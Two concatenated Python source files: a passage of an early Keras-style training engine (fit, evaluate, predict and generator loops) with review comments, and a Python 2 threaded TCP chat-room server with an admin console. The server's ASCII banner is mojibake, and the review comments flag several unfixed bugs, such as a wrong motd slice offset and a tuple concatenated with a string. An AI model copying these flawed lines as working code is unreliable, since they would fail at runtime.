    index_array = np.arange(nb_sample)
    for batch_index, (batch_start, batch_end) in enumerate(batches):
        batch_ids = index_array[batch_start:batch_end]
        if type(ins[-1]) is float:
            # do not slice the training phase flag
            ins_batch = slice_X(ins[:-1], batch_ids) + [ins[-1]]
        else:
            ins_batch = slice_X(ins, batch_ids)
        batch_outs = f(ins_batch)
        if isinstance(batch_outs, list):
            if batch_index == 0:
                # one running weighted sum per output
                # (bug fix: was `for batch_out in enumerate(batch_outs)`,
                # which iterated (index, value) tuples for no reason)
                for _ in batch_outs:
                    outs.append(0.)
            for i, batch_out in enumerate(batch_outs):
                outs[i] += batch_out * len(batch_ids)
        else:
            if batch_index == 0:
                outs.append(0.)
            outs[0] += batch_outs * len(batch_ids)
        if verbose == 1:
            progbar.update(batch_end)
    # convert the weighted sums into averages over all samples
    for i in range(len(outs)):
        outs[i] /= nb_sample
    if len(outs) == 1:
        return outs[0]
    return outs
def _standardize_user_data(self, x, y,
                           sample_weight=None, class_weight=None,
                           check_batch_dim=True, batch_size=None):
    '''Normalize user-provided inputs, targets and weights into lists of
    Numpy arrays and validate them against the compiled model.

    Raises an Exception if the model has not been compiled, if array
    lengths disagree, or (for stateful models) if the sample count is
    not divisible by `batch_size`.
    '''
    # NOTE(review): `check_batch_dim` is accepted but never forwarded --
    # both standardize_input_data calls below hard-code
    # check_batch_dim=False. Confirm whether this is intentional.
    if not hasattr(self, 'optimizer'):
        raise Exception('You must compile a model before training/testing.'
                        ' Use `model.compile(optimizer, loss)`.')
    x = standardize_input_data(x, self.input_names,
                               self.internal_input_shapes,
                               check_batch_dim=False,
                               exception_prefix='model input')
    y = standardize_input_data(y, self.output_names,
                               self.internal_output_shapes,
                               check_batch_dim=False,
                               exception_prefix='model target')
    sample_weights = standardize_sample_weights(sample_weight,
                                                self.output_names)
    class_weights = standardize_class_weights(class_weight,
                                              self.output_names)
    # combine per-sample and per-class weights, one entry per output
    sample_weights = [standardize_weights(ref, sw, cw, mode)
                      for (ref, sw, cw, mode)
                      in zip(y, sample_weights, class_weights, self.sample_weight_modes)]
    check_array_lengths(x, y, sample_weights)
    check_loss_and_target_compatibility(y, self.loss_functions, self.internal_output_shapes)
    if self.stateful and batch_size:
        # stateful RNNs require a constant batch size across all batches
        if x[0].shape[0] % batch_size != 0:
            raise Exception('In a stateful network, '
                            'you should only pass inputs with '
                            'a number of samples that can be '
                            'divided by the batch size. Found: ' +
                            str(x[0].shape[0]) + ' samples')
    return x, y, sample_weights
def fit(self, x, y, batch_size=32, nb_epoch=10, verbose=1, callbacks=None,
        validation_split=0., validation_data=None, shuffle=True,
        class_weight=None, sample_weight=None):
    '''Trains the model for a fixed number of epochs (iterations on a dataset).

    # Arguments
        x: Numpy array of training data,
            or list of Numpy arrays if the model has multiple inputs.
            If all inputs in the model are named, you can also pass a dictionary
            mapping input names to Numpy arrays.
        y: Numpy array of target data,
            or list of Numpy arrays if the model has multiple outputs.
            If all outputs in the model are named, you can also pass a dictionary
            mapping output names to Numpy arrays.
        batch_size: integer. Number of samples per gradient update.
        nb_epoch: integer, the number of times to iterate over the training data arrays.
        verbose: 0, 1, or 2. Verbosity mode. 0 = silent, 1 = verbose, 2 = one log line per epoch.
        callbacks: list of callbacks to be called during training.
            See [callbacks](/callbacks).
        validation_split: float between 0 and 1:
            fraction of the training data to be used as validation data.
            The model will set apart this fraction of the training data,
            will not train on it, and will evaluate the loss and any model metrics
            on this data at the end of each epoch.
        validation_data: data on which to evaluate the loss and any model metrics
            at the end of each epoch. The model will not be trained on this data.
            This could be a tuple (x_val, y_val) or a tuple (val_x, val_y, val_sample_weights).
        shuffle: boolean, whether to shuffle the training data before each epoch.
        class_weight: optional dictionary mapping class indices (integers) to
            a weight (float) to apply to the model's loss for the samples
            from this class during training.
            This can be useful to tell the model to "pay more attention" to
            samples from an under-represented class.
        sample_weight: optional array of the same length as x, containing
            weights to apply to the model's loss for each sample.
            In the case of temporal data, you can pass a 2D array
            with shape (samples, sequence_length),
            to apply a different weight to every timestep of every sample.
            In this case you should make sure to specify sample_weight_mode="temporal" in compile().

    # Returns
        A `History` instance. Its `history` attribute contains
        all information collected during training.
    '''
    # `callbacks=None` replaces the shared-mutable-default `callbacks=[]`;
    # behavior is unchanged for all callers.
    if callbacks is None:
        callbacks = []
    # validate user data
    x, y, sample_weights = self._standardize_user_data(
        x, y,
        sample_weight=sample_weight,
        class_weight=class_weight,
        check_batch_dim=False,
        batch_size=batch_size)
    # prepare validation data
    if validation_data:
        do_validation = True
        if len(validation_data) == 2:
            val_x, val_y = validation_data
            val_sample_weight = None
        elif len(validation_data) == 3:
            val_x, val_y, val_sample_weight = validation_data
        else:
            # bug fix: this was a bare `raise`, which is invalid when no
            # exception is active; raise an informative error instead,
            # matching the message used by `fit_generator`.
            raise Exception('validation_data should be a tuple '
                            '(val_x, val_y, val_sample_weight) '
                            'or (val_x, val_y). Found: ' +
                            str(validation_data))
        val_x, val_y, val_sample_weights = self._standardize_user_data(
            val_x, val_y,
            sample_weight=val_sample_weight,
            check_batch_dim=False,
            batch_size=batch_size)
        self._make_test_function()
        val_f = self.test_function
        if self.uses_learning_phase:
            # trailing 0. is the learning-phase flag (test mode)
            val_ins = val_x + val_y + val_sample_weights + [0.]
        else:
            val_ins = val_x + val_y + val_sample_weights
    elif validation_split and 0. < validation_split < 1.:
        do_validation = True
        # hold out the LAST `validation_split` fraction of the data
        split_at = int(len(x[0]) * (1. - validation_split))
        x, val_x = (slice_X(x, 0, split_at), slice_X(x, split_at))
        y, val_y = (slice_X(y, 0, split_at), slice_X(y, split_at))
        sample_weights, val_sample_weights = (
            slice_X(sample_weights, 0, split_at),
            slice_X(sample_weights, split_at))
        self._make_test_function()
        val_f = self.test_function
        if self.uses_learning_phase:
            val_ins = val_x + val_y + val_sample_weights + [0.]
        else:
            val_ins = val_x + val_y + val_sample_weights
    else:
        do_validation = False
        val_f = None
        val_ins = None

    # prepare input arrays and training function
    if self.uses_learning_phase:
        # trailing 1. is the learning-phase flag (train mode)
        ins = x + y + sample_weights + [1.]
    else:
        ins = x + y + sample_weights
    self._make_train_function()
    f = self.train_function

    # prepare display labels
    out_labels = self.metrics_names
    if do_validation:
        callback_metrics = copy.copy(out_labels) + ['val_' + n for n in out_labels]
    else:
        callback_metrics = copy.copy(out_labels)

    # delegate logic to _fit_loop
    return self._fit_loop(f, ins, out_labels=out_labels,
                          batch_size=batch_size, nb_epoch=nb_epoch,
                          verbose=verbose, callbacks=callbacks,
                          val_f=val_f, val_ins=val_ins, shuffle=shuffle,
                          callback_metrics=callback_metrics)
def evaluate(self, x, y, batch_size=32, verbose=1, sample_weight=None):
    '''Returns the loss value and metrics values for the model
    in test mode. Computation is done in batches.

    # Arguments
        x: Numpy array of test data,
            or list of Numpy arrays if the model has multiple inputs.
            If all inputs in the model are named, you can also pass a dictionary
            mapping input names to Numpy arrays.
        y: Numpy array of target data,
            or list of Numpy arrays if the model has multiple outputs.
            If all outputs in the model are named, you can also pass a dictionary
            mapping output names to Numpy arrays.
        batch_size: integer. Number of samples per evaluation batch.
        verbose: verbosity mode, 0 or 1.
        sample_weight: optional array of per-sample loss weights.

    # Returns
        Scalar test loss (if the model has a single output and no metrics)
        or list of scalars (if the model has multiple outputs
        and/or metrics). The attribute `model.metrics_names` will give you
        the display labels for the scalar outputs.
    '''
    # validate user data
    x, y, sample_weights = self._standardize_user_data(x, y,
                                                       sample_weight=sample_weight,
                                                       check_batch_dim=False,
                                                       batch_size=batch_size)
    # prepare inputs, delegate logic to _test_loop
    if self.uses_learning_phase:
        # trailing 0. is the learning-phase flag (test mode)
        ins = x + y + sample_weights + [0.]
    else:
        ins = x + y + sample_weights
    self._make_test_function()
    f = self.test_function
    return self._test_loop(f, ins,
                           batch_size=batch_size,
                           verbose=verbose)
def predict(self, x, batch_size=32, verbose=0):
    '''Generates output predictions for the input samples,
    processing the samples in a batched way.

    # Arguments
        x: the input data, as a Numpy array
            (or list of Numpy arrays if the model has multiple inputs).
        batch_size: integer.
        verbose: verbosity mode, 0 or 1.

    # Returns
        A Numpy array of predictions.
    '''
    # validate user data
    x = standardize_input_data(x, self.input_names,
                               self.internal_input_shapes,
                               check_batch_dim=False)
    if self.stateful:
        # stateful RNNs require full batches; a sample count smaller than
        # one batch is allowed, otherwise it must divide evenly
        if x[0].shape[0] > batch_size and x[0].shape[0] % batch_size != 0:
            raise Exception('In a stateful network, '
                            'you should only pass inputs with '
                            'a number of samples that can be '
                            'divided by the batch size. Found: ' +
                            str(x[0].shape[0]) + ' samples. '
                            'Batch size: ' + str(batch_size) + '.')
    # prepare inputs, delegate logic to _predict_loop
    if self.uses_learning_phase:
        # trailing 0. is the learning-phase flag (test mode)
        ins = x + [0.]
    else:
        ins = x
    self._make_predict_function()
    f = self.predict_function
    return self._predict_loop(f, ins,
                              batch_size=batch_size, verbose=verbose)
def train_on_batch(self, x, y,
                   sample_weight=None, class_weight=None):
    '''Runs a single gradient update on a single batch of data.

    # Arguments
        x: Numpy array of training data,
            or list of Numpy arrays if the model has multiple inputs.
            If all inputs in the model are named, you can also pass a dictionary
            mapping input names to Numpy arrays.
        y: Numpy array of target data,
            or list of Numpy arrays if the model has multiple outputs.
            If all outputs in the model are named, you can also pass a dictionary
            mapping output names to Numpy arrays.
        sample_weight: optional array of the same length as x, containing
            weights to apply to the model's loss for each sample.
            In the case of temporal data, you can pass a 2D array
            with shape (samples, sequence_length),
            to apply a different weight to every timestep of every sample.
            In this case you should make sure to specify sample_weight_mode="temporal" in compile().
        class_weight: optional dictionary mapping class indices (integers) to
            a weight (float) to apply to the model's loss for the samples
            from this class during training.
            This can be useful to tell the model to "pay more attention" to
            samples from an under-represented class.

    # Returns
        Scalar training loss (if the model has a single output and no metrics)
        or list of scalars (if the model has multiple outputs
        and/or metrics). The attribute `model.metrics_names` will give you
        the display labels for the scalar outputs.
    '''
    x, y, sample_weights = self._standardize_user_data(x, y,
                                                       sample_weight=sample_weight,
                                                       class_weight=class_weight,
                                                       check_batch_dim=True)
    if self.uses_learning_phase:
        # trailing 1. is the learning-phase flag (train mode)
        ins = x + y + sample_weights + [1.]
    else:
        ins = x + y + sample_weights
    self._make_train_function()
    outputs = self.train_function(ins)
    if len(outputs) == 1:
        return outputs[0]
    return outputs
def test_on_batch(self, x, y, sample_weight=None):
    '''Test the model on a single batch of samples.

    # Arguments
        x: Numpy array of test data,
            or list of Numpy arrays if the model has multiple inputs.
            If all inputs in the model are named, you can also pass a dictionary
            mapping input names to Numpy arrays.
        y: Numpy array of target data,
            or list of Numpy arrays if the model has multiple outputs.
            If all outputs in the model are named, you can also pass a dictionary
            mapping output names to Numpy arrays.
        sample_weight: optional array of the same length as x, containing
            weights to apply to the model's loss for each sample.
            In the case of temporal data, you can pass a 2D array
            with shape (samples, sequence_length),
            to apply a different weight to every timestep of every sample.
            In this case you should make sure to specify sample_weight_mode="temporal" in compile().

    # Returns
        Scalar test loss (if the model has a single output and no metrics)
        or list of scalars (if the model has multiple outputs
        and/or metrics). The attribute `model.metrics_names` will give you
        the display labels for the scalar outputs.
    '''
    x, y, sample_weights = self._standardize_user_data(
        x, y, sample_weight=sample_weight, check_batch_dim=True)
    ins = x + y + sample_weights
    if self.uses_learning_phase:
        # append the learning-phase flag (0. = test mode)
        ins = ins + [0.]
    self._make_test_function()
    outputs = self.test_function(ins)
    return outputs[0] if len(outputs) == 1 else outputs
def predict_on_batch(self, x):
    '''Returns predictions for a single batch of samples.
    '''
    x = standardize_input_data(x, self.input_names,
                               self.internal_input_shapes)
    # append the learning-phase flag (0. = test mode) when the model
    # distinguishes train/test behavior
    ins = x + [0.] if self.uses_learning_phase else x
    self._make_predict_function()
    outputs = self.predict_function(ins)
    return outputs[0] if len(outputs) == 1 else outputs
def fit_generator(self, generator, samples_per_epoch, nb_epoch,
                  verbose=1, callbacks=[],
                  validation_data=None, nb_val_samples=None,
                  class_weight={}, max_q_size=10):
    '''Fits the model on data generated batch-by-batch by
    a Python generator.
    The generator is run in parallel to the model, for efficiency.
    For instance, this allows you to do real-time data augmentation
    on images on CPU in parallel to training your model on GPU.

    # Arguments
        generator: a generator.
            The output of the generator must be either
            - a tuple (inputs, targets)
            - a tuple (inputs, targets, sample_weights).
            All arrays should contain the same number of samples.
            The generator is expected to loop over its data
            indefinitely. An epoch finishes when `samples_per_epoch`
            samples have been seen by the model.
        samples_per_epoch: integer, number of samples to process before
            going to the next epoch.
        nb_epoch: integer, total number of iterations on the data.
        verbose: verbosity mode, 0, 1, or 2.
        callbacks: list of callbacks to be called during training.
        validation_data: this can be either
            - a generator for the validation data
            - a tuple (inputs, targets)
            - a tuple (inputs, targets, sample_weights).
        nb_val_samples: only relevant if `validation_data` is a generator.
            number of samples to use from validation generator
            at the end of every epoch.
        class_weight: dictionary mapping class indices to a weight
            for the class.
        max_q_size: maximum size for the generator queue

    # Returns
        A `History` object.

    # Example

    ```python
        def generate_arrays_from_file(path):
            while 1:
                f = open(path)
                for line in f:
                    # create numpy arrays of input data
                    # and labels, from each line in the file
                    x1, x2, y = process_line(line)
                    yield ({'input_1': x1, 'input_2': x2}, {'output': y})
                f.close()

        model.fit_generator(generate_arrays_from_file('/my_file.txt'),
                            samples_per_epoch=10000, nb_epoch=10)
    ```
    '''
    # NOTE(review): `callbacks=[]` and `class_weight={}` are shared mutable
    # defaults; neither appears to be mutated in place here (`callbacks` is
    # rebound below), but replacing them with None-defaults would be safer.
    wait_time = 0.01  # in seconds
    epoch = 0
    do_validation = bool(validation_data)
    self._make_train_function()
    if do_validation:
        self._make_test_function()

    # python 2 has 'next', 3 has '__next__'
    # avoid any explicit version checks
    val_gen = (hasattr(validation_data, 'next') or
               hasattr(validation_data, '__next__'))
    if val_gen and not nb_val_samples:
        raise Exception('When using a generator for validation data, '
                        'you must specify a value for "nb_val_samples".')

    out_labels = self.metrics_names
    callback_metrics = out_labels + ['val_' + n for n in out_labels]

    # prepare callbacks
    self.history = cbks.History()
    callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
    if verbose:
        callbacks += [cbks.ProgbarLogger()]
    callbacks = cbks.CallbackList(callbacks)

    # it's possible to callback a different model than self:
    if hasattr(self, 'callback_model') and self.callback_model:
        callback_model = self.callback_model
    else:
        callback_model = self
    callbacks._set_model(callback_model)
    callbacks._set_params({
        'nb_epoch': nb_epoch,
        'nb_sample': samples_per_epoch,
        'verbose': verbose,
        'do_validation': do_validation,
        'metrics': callback_metrics,
    })
    callbacks.on_train_begin()

    # when validation data is a plain tuple, validate it once up front
    if do_validation and not val_gen:
        if len(validation_data) == 2:
            val_x, val_y = validation_data
            val_sample_weight = None
        elif len(validation_data) == 3:
            val_x, val_y, val_sample_weight = validation_data
        else:
            raise Exception('validation_data should be a tuple '
                            '(val_x, val_y, val_sample_weight) '
                            'or (val_x, val_y). Found: ' + str(validation_data))
        val_x, val_y, val_sample_weights = self._standardize_user_data(val_x, val_y, val_sample_weight)
        self.validation_data = val_x + [val_y, val_sample_weights]
    else:
        self.validation_data = None

    # start generator thread storing batches into a queue
    data_gen_queue, _stop = generator_queue(generator, max_q_size=max_q_size)

    callback_model.stop_training = False
    while epoch < nb_epoch:
        callbacks.on_epoch_begin(epoch)
        samples_seen = 0
        batch_index = 0
        while samples_seen < samples_per_epoch:
            generator_output = None
            # poll the queue until the producer thread delivers a batch
            # (or signals a stop)
            while not _stop.is_set():
                if not data_gen_queue.empty():
                    generator_output = data_gen_queue.get()
                    break
                else:
                    time.sleep(wait_time)

            if not hasattr(generator_output, '__len__'):
                _stop.set()
                raise Exception('output of generator should be a tuple '
                                '(x, y, sample_weight) '
                                'or (x, y). Found: ' + str(generator_output))
            if len(generator_output) == 2:
                x, y = generator_output
                sample_weight = None
            elif len(generator_output) == 3:
                x, y, sample_weight = generator_output
            else:
                _stop.set()
                raise Exception('output of generator should be a tuple '
                                '(x, y, sample_weight) '
                                'or (x, y). Found: ' + str(generator_output))
            # build batch logs
            batch_logs = {}
            # infer the batch size from the first input array
            if type(x) is list:
                batch_size = len(x[0])
            elif type(x) is dict:
                batch_size = len(list(x.values())[0])
            else:
                batch_size = len(x)
            batch_logs['batch'] = batch_index
            batch_logs['size'] = batch_size
            callbacks.on_batch_begin(batch_index, batch_logs)

            try:
                outs = self.train_on_batch(x, y,
                                           sample_weight=sample_weight,
                                           class_weight=class_weight)
            except Exception as e:
                # make sure the producer thread stops before re-raising
                _stop.set()
                raise

            if type(outs) != list:
                outs = [outs]
            for l, o in zip(out_labels, outs):
                batch_logs[l] = o

            callbacks.on_batch_end(batch_index, batch_logs)

            # construct epoch logs
            epoch_logs = {}
            batch_index += 1
            samples_seen += batch_size

            # epoch finished
            if samples_seen > samples_per_epoch:
                warnings.warn('Epoch comprised more than '
                              '`samples_per_epoch` samples, '
                              'which might affect learning results. '
                              'Set `samples_per_epoch` correctly '
                              'to avoid this warning.')
            if samples_seen >= samples_per_epoch and do_validation:
                if val_gen:
                    val_outs = self.evaluate_generator(validation_data,
                                                       nb_val_samples,
                                                       max_q_size=max_q_size)
                else:
                    # no need for try/except because
                    # data has already been validated
                    val_outs = self.evaluate(val_x, val_y,
                                             sample_weight=val_sample_weights,
                                             verbose=0)
                if type(val_outs) is not list:
                    val_outs = [val_outs]
                # same labels assumed
                for l, o in zip(out_labels, val_outs):
                    epoch_logs['val_' + l] = o

        callbacks.on_epoch_end(epoch, epoch_logs)
        epoch += 1
        if callback_model.stop_training:
            break

    _stop.set()
    callbacks.on_train_end()
    return self.history
def evaluate_generator(self, generator, val_samples, max_q_size=10):
    '''Evaluates the model on a data generator. The generator should
    return the same kind of data as accepted by `test_on_batch`.

    Arguments:
        generator:
            generator yielding tuples (inputs, targets)
            or (inputs, targets, sample_weights)
        val_samples:
            total number of samples to generate from `generator`
            before returning.
        max_q_size: maximum size for the generator queue

    # Returns
        Scalar test loss (if the model has a single output and no metrics)
        or list of scalars (if the model has multiple outputs
        and/or metrics). The attribute `model.metrics_names` will give you
        the display labels for the scalar outputs.
    '''
    self._make_test_function()

    processed_samples = 0
    wait_time = 0.01  # queue polling interval, in seconds
    all_outs = []  # per-batch test outputs
    weights = []   # per-batch sample counts (weights for the average)
    data_gen_queue, _stop = generator_queue(generator, max_q_size=max_q_size)

    while processed_samples < val_samples:
        generator_output = None
        # poll the queue until the producer thread delivers a batch
        while not _stop.is_set():
            if not data_gen_queue.empty():
                generator_output = data_gen_queue.get()
                break
            else:
                time.sleep(wait_time)

        if not hasattr(generator_output, '__len__'):
            _stop.set()
            raise Exception('output of generator should be a tuple '
                            '(x, y, sample_weight) '
                            'or (x, y). Found: ' + str(generator_output))
        if len(generator_output) == 2:
            x, y = generator_output
            sample_weight = None
        elif len(generator_output) == 3:
            x, y, sample_weight = generator_output
        else:
            _stop.set()
            raise Exception('output of generator should be a tuple '
                            '(x, y, sample_weight) '
                            'or (x, y). Found: ' + str(generator_output))
        try:
            outs = self.test_on_batch(x, y, sample_weight=sample_weight)
        except Exception as e:
            # make sure the producer thread stops before re-raising
            _stop.set()
            raise

        # infer the number of samples in this batch from the inputs
        if type(x) is list:
            nb_samples = len(x[0])
        elif type(x) is dict:
            nb_samples = len(list(x.values())[0])
        else:
            nb_samples = len(x)
        all_outs.append(outs)

        processed_samples += nb_samples
        weights.append(nb_samples)

    _stop.set()
    # NOTE(review): `outs` is unbound if the loop body never ran
    # (val_samples <= 0) -- confirm callers always pass a positive count.
    if type(outs) is not list:
        return np.average(np.asarray(all_outs),
                          weights=weights)
    else:
        # average each output separately, weighted by batch sample count
        averages = []
        for i in range(len(outs)):
            averages.append(np.average([out[i] for out in all_outs],
                                       weights=weights))
        return averages
def predict_generator(self, generator, val_samples, max_q_size=10):
    '''Generates predictions for the input samples from a data generator.
    The generator should return the same kind of data as accepted by
    `predict_on_batch`.

    # Arguments
        generator: generator yielding batches of input samples.
        val_samples: total number of samples to generate from `generator`
            before returning.
        max_q_size: maximum size for the generator queue

    # Returns
        Numpy array(s) of predictions.
    '''
    self._make_predict_function()

    processed_samples = 0
    wait_time = 0.01  # queue polling interval, in seconds
    all_outs = []
    data_gen_queue, _stop = generator_queue(generator, max_q_size=max_q_size)

    while processed_samples < val_samples:
        generator_output = None
        # poll the queue until the producer thread delivers a batch
        while not _stop.is_set():
            if not data_gen_queue.empty():
                generator_output = data_gen_queue.get()
                break
            else:
                time.sleep(wait_time)

        if isinstance(generator_output, tuple):
            # targets / sample weights may be present but are ignored here
            if len(generator_output) == 2:
                x, y = generator_output
                sample_weight = None
            elif len(generator_output) == 3:
                x, y, sample_weight = generator_output
            else:
                _stop.set()
                raise Exception('output of generator should be a tuple '
                                '(x, y, sample_weight) '
                                'or (x, y). Found: ' + str(generator_output))
        else:
            x = generator_output

        try:
            outs = self.predict_on_batch(x)
        except Exception as e:
            # make sure the producer thread stops before re-raising
            _stop.set()
            raise

        # infer the number of samples in this batch from the inputs
        if type(x) is list:
            nb_samples = len(x[0])
        elif type(x) is dict:
            nb_samples = len(list(x.values())[0])
        else:
            nb_samples = len(x)

        if type(outs) != list:
            outs = [outs]

        if len(all_outs) == 0:
            # pre-allocate full-size output arrays on the first batch
            for out in outs:
                shape = (val_samples,) + out.shape[1:]
                all_outs.append(np.zeros(shape))

        for i, out in enumerate(outs):
            all_outs[i][processed_samples:(processed_samples + nb_samples)] = out
        processed_samples += nb_samples

    _stop.set()
    if len(all_outs) == 1:
        return all_outs[0]
    return all_outs
|
ChatRoom1.0Server.py | #!/usr/bin/env python
# -.- coding: utf-8 -.-y
import threading
import Queue
import socket
import time
import sys
import os
from cmd import Cmd
#Created by Camerin Figueroa
cv = "1.0"  # client/server protocol version string

# Cross-thread state travels through single-item queues: readers get()
# the payload and immediately put() it back.
q = Queue.Queue()       # message database: one list per user
q.put([])
errors = Queue.Queue()  # accumulated error strings
errors.put([])
motd = Queue.Queue()    # message of the day (filled from config below)
quit = Queue.Queue()    # "quitting:" sentinel used to shut clients down
quit.put("")
mesg = Queue.Queue()    # most recent broadcast chat message
mesg.put("")
online = Queue.Queue()  # list of currently connected usernames
online.put([])
print """\33[91m
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโ โโโโโโ โโโโโโโ
โ โ โ โ โ
โ โโโโโโ โ โโโ โ
โโโโโโโโโโโโโโโ โโ โโโโโโ
โ โโโโโโ โโ
โ โ โ โโโ โโโโโโโโServer
โโโโโโโโโโ โ โ โโโ โ
โโโโโโโ โ โ โ โโโโโโโ
Chat Room Clientโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
\33[92m"""
port = 99999  # sentinel meaning "not configured"
configcont = "#Replace Everything behind = sign\n#Ex before: config = edit\n#Ex after: config = configinput\n\nmotd = Hello world This is a new Chat Room Server made by Camerin Figueroa\nport = 22550\n"
if os.path.isfile('./crsconfig.txt') == True:
    f = open('./crsconfig.txt', 'r')
    # (removed a large block of commented-out legacy client code here)
    configuration = f.read()
    f.close()
    configuration = configuration.split("\n")
    for line in configuration:
        if "motd =" in line:
            # NOTE(review): "motd = " is 7 characters, so [10:] drops the
            # first three characters of the motd text -- confirm intended.
            motd.put(line[10:])
        else:
            pass
        if "port = " in line:
            port = int(line[7:])
        else:
            pass
else:
    # no config yet: write a template and ask the operator to edit it
    f = open('./crsconfig.txt', 'w')
    f.write(configcont)
    f.close()
    print "Please edit crsconfig.txt"
    sys.exit()
if port != 99999:
    pass
else:
    # config existed but contained no port line: rewrite the template
    f = open('./crsconfig.txt', 'w')
    f.write(configcont)
    f.close()
    print "Please edit crsconfig.txt"
    sys.exit()
def console(q, errors, motd):
    # Run the interactive admin console; only active when the module is
    # executed as the main program. The queue arguments are unused here
    # (the prompt reads the module-level globals directly).
    if __name__ != '__main__':
        return
    prompt = consoleprompt()
    prompt.prompt = '> '
    prompt.cmdloop('Starting prompt...')
class consoleprompt(Cmd):
    # Admin console built on stdlib cmd.Cmd: each do_<name> method
    # implements one command typed at the '> ' prompt.

    def do_printdb(self, args):
        # Print every stored chat line for every user.
        global q
        self.quit = quit
        # NOTE(review): the assignment above stores the global `quit`
        # queue on self but is never read back -- looks vestigial; confirm.
        db = q.get()
        q.put(db)
        for line in db:
            for lin in line:
                print lin

    def do_online(self, args):
        # List the usernames currently connected.
        global online
        on = online.get()
        online.put(on)
        print "Online:"
        for username in on:
            print username

    def do_printerrors(self, args):
        # Dump the accumulated error strings.
        global errors
        erlist = errors.get()
        errors.put(erlist)
        print "Errors:"
        for error in erlist:
            print error

    def do_motd(self, args):
        # Replace the message of the day: usage `motd -c <new text>`.
        if "-c" in args:
            global motd
            oldmotd = motd.get()
            motd.put(args[3:])
            print "motd changed from " + oldmotd + " to " + args[3:]
        else:
            print "add -c newcmd"

    def do_quit(self, args):
        # Broadcast the quit sentinel, give client threads a moment to
        # see it, then hard-exit the whole process.
        global quit
        print "Quitting."
        quit.get()
        quit.put("quitting:")
        time.sleep(2)
        os._exit(0)
class Server(object):
    # TCP chat server: one daemon-style thread per accepted connection.
    # Shared state (motd, message db, online list, ...) travels through
    # single-item queues read with get() and immediately restored with put().

    def __init__(self, host, port, q, motd, errors, mesg, quit, online):
        self.motd = motd
        self.quit = quit
        self.errors = errors
        self.host = host
        self.port = port
        self.q = q
        self.mesg = mesg
        self.online = online
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # allow quick restarts on the same port
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((self.host, self.port))

    def listen(self):
        # Accept forever; each client is served on its own thread.
        self.sock.listen(5)
        while True:
            client, address = self.sock.accept()
            client.settimeout(10)
            #threading.Thread(target = self.sendcid,args = (client,address)).start()
            #global clientdb
            threading.Thread(target = self.listenToClient,args = (client,address)).start()

    def listenToClient(self, client, address):
        # First packet decides the mode: "cv:<version>" with a mismatched
        # version is rejected, "screen:" enters read-only monitor mode,
        # anything else is treated as a compatible chat client.
        global cv
        cmd = self.motd.get()
        self.motd.put(cmd)
        #global clientdb
        rcv = client.recv(128)
        if str(cv) != rcv[3:] and "cv:" in rcv:
            # version mismatch: report the server's protocol version
            client.send("comp:0:" + str(cv))
        elif rcv == "screen:":
            # monitor mode: push each new chat message as it appears and
            # send the online list roughly every 1000 ticks
            online = self.online.get()
            self.online.put(online)
            client.send(str(online))
            cmessage = self.mesg.get()
            self.mesg.put(cmessage)
            lm = cmessage  # last message already delivered to this client
            tick = 0
            qi = False  # set True when either side wants to quit
            try:
                while qi == False:
                    cmessage = self.mesg.get()
                    self.mesg.put(cmessage)
                    online = self.online.get()
                    self.online.put(online)
                    if cmessage != lm:
                        client.send(cmessage)
                        lm = cmessage
                    else:
                        pass
                    quit = self.quit.get()
                    self.quit.put(quit)
                    if tick == 1000:
                        # periodic online-list update + liveness check
                        client.send("online:" + str(online))
                        onlinecheck = client.recv(1024)
                        if onlinecheck == "quitting:":
                            quit = "quitting:"
                            qi = True
                        else:
                            pass
                        tick = 0
                    else:
                        pass
                    tick = tick + 1
                    if quit == "quitting:":
                        client.send("quitting:")
                        client.close()
                        qi = True
                    else:
                        pass
                    time.sleep(.001)
            except:
                # NOTE(review): bare except hides the real failure; at
                # minimum the exception should be logged.
                print "Screen Error"
                pass
        else:
            # chat-client mode: version accepted
            client.send("comp:1")
            name = client.recv(1024)
            if "user:" not in name:
                client.send("error:wrong type of packet received. 'user:' was not within the packet")
                erlist = errors.get()
                # NOTE(review): getpeername() returns a tuple, so
                # concatenating it with a str would raise TypeError -- confirm.
                erlist.append(client.getpeername() + ":wrong type of packet received. 'user:' was not within the packet")
                errors.put(erlist)
            else:
                name = name[5:]
                # reject usernames that are already online
                used = False
                online = self.online.get()
                self.online.put(online)
                for user in online:
                    if user == name:
                        used = True
                    else:
                        pass
                if used == True:
                    client.send("error:Username has already been used before.")
                    client.close()
                    erlist = errors.get()
                    erlist.append(name + ":" + name + ":Username has already been used before.")
                    errors.put(erlist)
                    check = False
                else:
                    client.send("user:" + name)
                    check = True
                if check == True:
                    # find (or create) this user's row in the message db
                    db = q.get()
                    q.put(db)
                    leng = 0
                    for nam in db:
                        if name == nam[0]:
                            nl = leng
                        else:
                            leng = leng + 1
                    if 'nl' in locals():
                        pass
                    else:
                        nl = leng
                        db.append([name,])
                        q.get()
                        q.put(db)
                    try:
                        online = self.online.get()
                        online.append(name)
                        self.online.put(online)
                        # main receive loop: store and broadcast messages
                        while True:
                            rmesg = client.recv(1024)
                            if "" == rmesg:
                                pass
                            elif "/help" == rmesg:
                                pass
                            elif "quitting:" == rmesg:
                                # NOTE(review): `online` is a list here, so
                                # online.get()/online.put() raise
                                # AttributeError (caught by the except
                                # below) -- confirm intended.
                                on = online.get()
                                on.remove(name)
                                online.put(on)
                            elif "ping:" == rmesg:
                                pass
                            else:
                                # store and broadcast "<name>:<text>"
                                db = q.get()
                                db[leng].append(name + ":" + rmesg[5:])
                                q.put(db)
                                self.mesg.get()
                                self.mesg.put(name + ":" + rmesg[5:])
                    except:
                        # client vanished: drop them from the online list
                        online = self.online.get()
                        if name in online:
                            online.remove(name)
                        else:
                            pass
                        self.online.put(online)
                else:
                    pass
def writeoutput(q, errors):
    '''Periodically dump the chat database and error list to crs.log.

    Runs forever on its own thread. `q` and `errors` are single-item
    queues whose payloads are read with get() and immediately put() back.
    '''
    while True:
        try:
            time.sleep(10)
            tta = q.get()
            q.put(tta)
            error = errors.get()
            errors.put(error)
            fw = "Users:\n"
            errs = ""
            for err in error:
                errs = errs + err + "\n"
            for line in tta:
                for lin in line:
                    fw = fw + str(lin) + "\n"
